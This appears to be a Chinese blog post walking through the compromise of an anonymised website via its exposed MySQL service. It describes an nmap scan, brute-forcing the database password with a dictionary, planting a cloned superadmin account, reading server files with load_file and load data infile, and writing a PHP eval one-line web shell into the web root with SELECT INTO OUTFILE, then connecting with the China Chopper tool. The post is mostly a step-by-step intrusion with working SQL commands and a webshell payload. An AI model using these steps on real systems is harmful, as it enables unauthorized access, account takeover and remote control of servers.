• mysql渗透过程


    1 打开目标站点:www.xxx.com

    2 注册账号并登录,大概找下注入点,没找到

    3 用namp -A -T4 目标站点扫描开放的服务

       发现mysql等

    4 猜弱口令 + 字典  对mysql进行了破译  (运气较好,得到了密码)

    5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符

       于是复制了一个超级管理员,用户名及密码复制之前注册的账号

    6  打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。

    7  在mysql 中尝试读取文件

        select load_file('c:/windows/php.ini');  结果为null

      于是创建新表

    create table datainfo (aaa text);

      尝试读取文件到表中

           load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found

      可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录

          select load_file('D:/phpStudy4IIS/tools/phpStudy.ini');  发现网站根目录等

         写入一句话

         select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';

         用菜刀连接:www.xxx.com/include/xx.php   cmd

  • 相关阅读:
    MySQL正则表达式 REGEXP详解
    INSERT DELAYED 句法
    mysql查询语句分析 explain用法
    mysql导出导入
    sf04_操作系统中 heap 和 stack 的区别
    2.4 Rust Ownership
    2.1 GO 变量定义
    1.3 IDAE 中使用GO开发项目
    my30_表碎片整理
    my29_PXC集群状态查看
  • 原文地址:https://www.cnblogs.com/yzloo/p/10390888.html
Copyright © 2020-2023  润新知